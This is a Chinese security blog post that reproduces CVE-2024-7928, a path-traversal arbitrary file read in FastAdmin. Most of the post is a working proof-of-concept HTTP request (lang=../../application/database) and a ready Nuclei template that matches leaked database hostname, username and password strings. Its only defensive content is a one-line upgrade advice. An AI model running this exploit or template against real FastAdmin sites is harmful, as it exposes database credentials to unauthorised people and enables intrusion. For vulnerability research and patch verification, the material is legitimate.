【漏洞复现】FastAdmin 任意文件读取漏洞(CVE-2024-7928)
【漏洞复现】FastAdmin 任意文件读取漏洞(CVE-2024-7928)
紫色皓月 皓月的笔记本 2024-10-02 16:00
声明:请勿将文章内的相关技术用于非法目的,如有相关非法行为与文章作者和本公众号无关。
0X01
简介
FastAdmin基于ThinkPHP强大的命令行功能扩展了一系列命令行功能,可以很方便的一键生成CRUD、生成权限菜单、压缩打包CSS和JS、启用禁用插件等功能。
漏洞编号:
CVE-2024-7928
影响范围:
FastAdmin <
1.3.4.20220530
复现环境:
FastAdmin 1.0.0.20181031
0X02
漏洞复现
POC:
GET /index/ajax/lang?lang=../../application/database HTTP/1.1
Host: 192.168.31.133
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: keep-alive
Nuclei:
id: FastAdmin-renyiwenjianduqu-CVE-2024-7928
info:
name: FastAdmin 任意文件读取漏洞-CVE-2024-7928
author: 紫色皓月
severity: high
description: FastAdmin 任意文件读取漏洞
tags: CVE-2024-7928,2024,FastAdmin,任意文件读取
requests:
- raw:
- |
GET /index/ajax/lang?lang=../../application/database HTTP/1.1
Host: {{Hostname}}
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: keep-alive
req-condition: true
matchers:
- type: word
words:
- 'hostname'
- 'username'
- 'password'
- 'database'
condition: and
0X03 修复建议
升级至安全版本!
0X04 写在最后
回复“加群”,获取群号。
侵删!